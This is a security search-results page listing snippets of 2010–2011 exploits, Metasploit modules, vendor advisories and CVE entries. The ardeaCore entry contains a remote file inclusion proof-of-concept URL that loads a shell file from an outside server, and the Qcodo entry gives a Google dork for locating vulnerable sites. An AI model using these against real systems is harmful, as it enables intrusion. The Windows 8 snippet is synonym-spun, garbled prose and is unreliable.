1511 matches found
VSFTPD 2.3.4 Backdoor Command Execution
$Id: vsftpd234backdoor.rb 13093 2011-07-04 20:09:32Z hdm $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
[SECURITY] Fedora 15 Update: gjs-0.7.14-6.fc15
Gjs allows using GNOME libraries from Javascript. It's based on the Spidermonkey Javascript engine from Mozilla and the GObject introspection framework...
Metasploit Framework 3.7.2 Released - Download
Metasploit Framework 3.7.2 includes 698 exploit modules, 358 auxiliary modules, and 54 post modules, 11 new exploits, 1 new auxiliary module, and 15 new post modules. This release addresses several issues with updating the framework, adds 11 exploit /...
Joomla A Cool Debate 1.0.3 Local File Inclusion
A Cool Debate 1.0.3 Component Joomla Local File Inclusion - Discovered by : Chip D3 Bi0s - Email : chipdebiosatgmaildotcom - Group : LatinHackTeam - Date : 18 June 2011 - Where : From Remote...
Metasploit Framework 3.7.1 Released !
Statistics: Metasploit now ships with 687 exploit modules, 357 auxiliary modules, and 39 post modules. 2 new exploits and 2 new auxiliary modules have been added since the last release. Highlights & New Features: This release addresses a performance issue with HT...
Java floating-point value denial of service vulnerability Hazard Analysis-vulnerability warning-the black bar safety net
By emptiness prodigal heart http://www.inbreak.net/ JAVA a vulnerability, the CVE-2010-4476, will result in a denial of service attack. Everyone from the Bulletin, to see such a piece of code, quite long. Meaning only the developers to write such code only on the server. We certainly will...
Important: Red Hat Security Advisory: jboss-seam2 security update
Updated jboss-seam2 packages that fix one security issue are now available for JBoss Enterprise Application Platform 4.3 for Red Hat Enterprise Linux 4 and 5. The Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System CVSS...
CVE-2011-1714
The vulnerability is an XSS in QooxDoo’s jsonp_primitive.php (framework/source/resource/qx/test/jsonp_primitive.php) affecting QooxDoo 1.3 and possibly other versions, as used by eyeOS 2.2/2.3. The underlying issue is reflected script injection via the callback parameter. Current documents do not...
Fedora Update for mono-addins FEDORA-2011-3393
Check for the Version of mono-addins. OpenVAS Vulnerability Test: Fedora Update for mono-addins FEDORA-2011-3393. Authors: System Generated Check. Copyright: Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it unde...
Trend Micro Message Routing Framework Detection
Binary data trendmicromrfdetect.nbin...
Metasploit Framework Detection (Windows SMB Login)
This script finds the installed Metasploit Framework version. The script logs in via SMB, searches for Metasploit in the registry and gets the version from SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the...
CVE-2011-1056
Metasploit Framework Local Privilege Escalation (CVE-2011-1056): on Windows, the Metasploit installer uses weak inherited permissions for the installation directory, enabling local users to replace critical files with a Trojan horse and gain privileges. Based on NVD/OpenVAS records, this is a loc...
DSA-2163-1 python-django - multiple
Bulletin has no description...
Qcodo Development Framework 0.3.3 Information Disclosure
Exploit Title: Qcodo Development Framework 0.3.3 Full Info Disclosure Google Dork: allintext: /qcodo/devtools/codegen.php Date: 5/02/2011 Author: Daniel Godoy Author Mail: DanielGodoyatGobiernoFederaldotcom Author Web: www.delincuentedigital.com.ar Software Link: http://www.qcodo.com/ Version: Al...
All about Microsoft Windows 8 !
Only Microsoft knows how the abutting adaptation of its Windows operating arrangement will attending and what it will be called, but big changes could be advanced for the OS that assemblage accredit to as "Windows 8." At this year's Consumer Electronics Appearance in Las Vegas, Microsoft appear...
CakePHP 1.3.5/1.2.8 - 'Unserialize()' File Inclusion
Source: http://securityreason.com/securityalert/8026 CakePHP data; $token = urldecode($check['_Token']['fields']); if (strpos($token, ':')) { list($token, $locked) = explode(':', $token, 2); } $locked = unserialize(str_rot13($locked)); -- snip -- The $check array contains our POST data and $locked is a simple rot-13...
ardeaCore 2.25 - PHP Framework Remote File Inclusion
ardeaCore 2.25 - PHP Framework Remote File Inclusion ! Discovered: n0n0x ! Homepage: http://priasantai.uni.cc/ ! Remote: yes Hello gay x PoC: http://host/ardeaCorev2.25/ardeaCore/lib/core/ardeaInit.php?pathForArdeaCore=http://server/shell.tmp???...
Microsoft WMI Administration Tools ActiveX Buffer Overflow
$Id: wmiadmintools.rb 11405 2010-12-23 01:36:54Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework...
Experts: OpenBSD Backdoor Allegations 'Almost Certainly False'
The incredible allegations that developers working under the auspices of the FBI and Justice Department planted a backdoor in the IPSec stack of the OpenBSD operating system are likely just that, experts say: not credible. “There is no way that the FBI paid anyone to create backdoors in OpenBSD a...
Apache Struts2 XWork ParameterInterceptor security bypass
Added: 08/05/2010 CVE: CVE-2010-1870 BID: 41592 OSVDB: 66280 Background Apache Struts is a Java web application framework. Apache Struts version 2 is based on WebWork 2. WebWork 2 uses XWork to invoke actions based on HTTP parameter names. The ParameterInterceptor component of XWork runs the...